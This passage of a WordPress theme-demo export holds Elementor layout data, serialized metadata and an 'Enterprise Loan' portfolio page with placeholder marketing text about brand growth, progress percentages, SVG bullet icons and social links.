management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"68be27f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5455f6f","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f1d8c99","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"05b08d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ab99b2b","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9be1826","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"df3c4dd","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"361cd0e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[835]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Enterprise Loan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=830</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>January 12, 2018</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>830</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[enterprise-loan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[831]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[832]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"7adbf0ca","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"14f0c251","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"431e8d5","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"61d4ce9c","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"24904d7d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"771bc1d8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"21ed026b","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca6bc03","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"49ed3d5a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3fabd3ac","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"17e6f8b0","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"b60571d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"68f7ccb0","elType":"widget","settings":{"editor":"<p>January 12, 2018<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2502bf2","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"36dfc991","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25e1e05c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"5d14aed4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e1392f9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"c68bd8d","elType":"section","settings":[],"elements":[{"id":"7563272","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"573cb7c","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4e7a58d","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e43082","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"d92a593","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"fe59145","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"556782e","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f2118eb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"59140bf","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"eea23e8","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c82eb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d2c57be","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"113c821","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"426bab0","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4456f6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f8bef6b","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"bcb3a34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"89e7e39","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0892927","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"259ee94","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"daab8fe","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f2e7501","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b9acb12","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"93558db","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
